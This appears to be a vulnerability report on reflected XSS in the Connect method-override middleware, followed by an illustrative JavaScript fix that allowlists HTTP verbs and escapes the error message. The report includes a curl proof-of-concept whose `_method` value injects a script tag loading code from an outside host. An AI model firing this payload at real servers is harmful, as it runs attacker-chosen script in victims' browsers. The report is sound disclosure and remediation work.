This middleware overwrites `req.method` with the `req.body['_method']` value. When you don't catch the error, it responds with a default error message, "Cannot [METHOD] [URL]":

`res.end('Cannot ' + req.method + ' ' + utils.escape(req.originalUrl));`

Because `req.method` is not escaped here (only `req.originalUrl` is), you can force a Cross-Site Scripting in the response:
~ curl "localhost:3000" -d "_method=<script src=http://martes13.net/a.js></script>"
Cannot <SCRIPT SRC=HTTP://MARTES13.NET/A.JS></SCRIPT> /
This is very dangerous because in a server like ExpressJS it won't be handled by an `app.all('/*', ...)` handler, so all servers using this middleware are vulnerable.
To fix this hole, I don't know if it is better to fix the proto.js#L155 or the middleware.
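To show what either fix looks like, here is an added illustration (not Connect's own code): a method-override helper that only honours an allowlisted HTTP verb, next to the unsafe copy-whatever-the-client-sent behaviour described above, and a builder for the "Cannot METHOD URL" message that escapes both interpolated fields. The request shape `{ method, originalUrl, body }`, the `escapeHtml` helper and the sample payload are assumptions made for this example.

```javascript
// Added illustration, not the connect source. Assumed request shape:
// req = { method, originalUrl, body }.

const ALLOWED_METHODS = new Set([
  'GET', 'POST', 'PUT', 'PATCH', 'DELETE', 'HEAD', 'OPTIONS',
]);

// Minimal HTML escaping, standing in for what utils.escape does to the URL.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// Unsafe variant (the behaviour the issue describes): whatever the client
// sends in _method becomes req.method, uppercased.
function unsafeOverride(req) {
  if (req.body && typeof req.body._method === 'string') {
    req.method = req.body._method.toUpperCase();
  }
  return req;
}

// Hardened middleware fix: the override is honoured only for a known verb;
// anything else is ignored and the original method is kept.
function safeOverride(req) {
  const wanted = req.body && req.body._method;
  if (typeof wanted === 'string') {
    const upper = wanted.toUpperCase();
    if (ALLOWED_METHODS.has(upper)) req.method = upper;
  }
  return req;
}

// Hardened default-handler fix: escape every field put into the message,
// not just the URL, so an attacker-controlled method cannot inject markup.
function notFoundMessage(req) {
  return 'Cannot ' + escapeHtml(req.method) + ' ' + escapeHtml(req.originalUrl);
}

// Constructed sample request carrying the kind of payload from the report.
function sampleRequest() {
  return {
    method: 'POST',
    originalUrl: '/',
    body: { _method: '<script src=x></script>' },
  };
}
```

Either fix alone closes the reflected XSS; applying both means a future handler that echoes `req.method` unescaped still never sees an attacker-chosen string.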